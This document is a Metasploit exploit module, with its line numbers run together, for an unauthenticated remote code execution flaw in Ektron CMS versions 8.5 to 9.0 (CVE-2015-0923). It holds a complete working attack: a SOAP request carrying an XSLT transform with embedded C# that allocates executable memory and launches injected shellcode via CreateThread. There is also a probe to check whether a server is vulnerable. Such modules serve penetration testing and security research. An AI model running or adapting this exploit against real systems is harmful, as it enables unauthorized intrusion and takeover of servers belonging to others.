Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',16'Description' => %q{17Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have18vulnerabilities in various operations within the ServerControlWS.asmx19web services. These vulnerabilities allow for RCE without authentication and20execute in the context of IIS on the remote system.21},22'Author' => [23'catatonicprime'24],25'License' => MSF_LICENSE,26'References' => [27[ 'CVE', '2015-0923' ],28[ 'US-CERT-VU', '377644' ],29[ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]30],31'Payload' => {32'Space' => 2048,33'StackAdjustment' => -350034},35'Platform' => 'win',36'Privileged' => true,37'Targets' => [38['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]39],40'DefaultTarget' => 0,41'DisclosureDate' => '2015-02-05',42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options(51[52OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),53OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),54OptEnum.new('TARGETOP',55[56true,57'The vulnerable web service operation to exploit',58'ContentBlockEx',59[60'ContentBlockEx',61'GetBookmarkString',62'GetContentFlaggingString',63'GetContentRatingString',64'GetMessagingString'65]66])67]68)69end7071def vulnerable_param72return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'7374'xslt'75end7677def required_params78return '' if datastore['TARGETOP'] == 'ContentBlockEx'7980'<showmode/>'81end8283def target_operation84datastore['TARGETOP']85end8687def prologue88<<~XSLT89<?xml version="1.0" encoding="utf-8"?>90<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">91<soap:Body>92<#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">93#{required_params}94<#{vulnerable_param}>95<![CDATA[96<xsl:transform version="2.0"97xmlns:xsl="http://www.w3.org/1999/XSL/Transform"98xmlns:msxsl="urn:schemas-microsoft-com:xslt"99xmlns:user="http://mycompany.com/mynamespace">100<msxsl:script language="C#" implements-prefix="user">101XSLT102end103104def epilogue105<<~XSLT106</msxsl:script>107<xsl:template match="/">108<xsl:value-of select="user:xml()"/>109</xsl:template>110</xsl:transform>111]]>112</#{vulnerable_param}>113</#{target_operation}>114</soap:Body>115</soap:Envelope>116XSLT117end118119def check120fingerprint = rand_text_alpha(5 + rand(5))121xslt_data = <<~XSLT122#{prologue}123public string xml() {124return "#{fingerprint}";125}126#{epilogue}127XSLT128129res = send_request_cgi(130{131'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",132'version' => '1.1',133'method' => 'POST',134'ctype' => "text/xml; charset=UTF-8",135'headers' => {136"Referer" => build_referer137},138'data' => xslt_data139}140)141142if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/143return Exploit::CheckCode::Vulnerable144end145146return Exploit::CheckCode::Safe147end148149def uri_path150uri_path = target_uri.path151uri_path << "/" if uri_path[-1, 1] != "/"152uri_path153end154155def build_referer156if datastore['SSL']157schema = "https://"158else159schema = "http://"160end161162referer = schema163referer << rhost164referer << ":#{rport}"165referer << uri_path166referer167end168169def exploit170print_status("Generating the EXE Payload and the XSLT...")171fingerprint = rand_text_alpha(5 + rand(5))172173xslt_data = <<~XSLT174#{prologue}175private static UInt32 MEM_COMMIT = 0x1000;176private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;177178[System.Runtime.InteropServices.DllImport("kernel32")]179private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);180181[System.Runtime.InteropServices.DllImport("kernel32")]182private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);183184public string xml()185{186string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";187byte[] shellcode = System.Convert.FromBase64String(shellcode64);188UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);189System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);190IntPtr hThread = IntPtr.Zero;191IntPtr pinfo = IntPtr.Zero;192UInt32 threadId = 0;193hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);194return "#{fingerprint}";195}196#{epilogue}197XSLT198199print_status("Trying to run the xslt transformation...")200res = send_request_cgi(201{202'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",203'version' => '1.1',204'method' => 'POST',205'ctype' => "text/xml; charset=UTF-8",206'headers' => {207"Referer" => build_referer208},209'data' => xslt_data210}211)212if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/213print_good("Exploitation was successful")214else215fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")216end217end218end219220221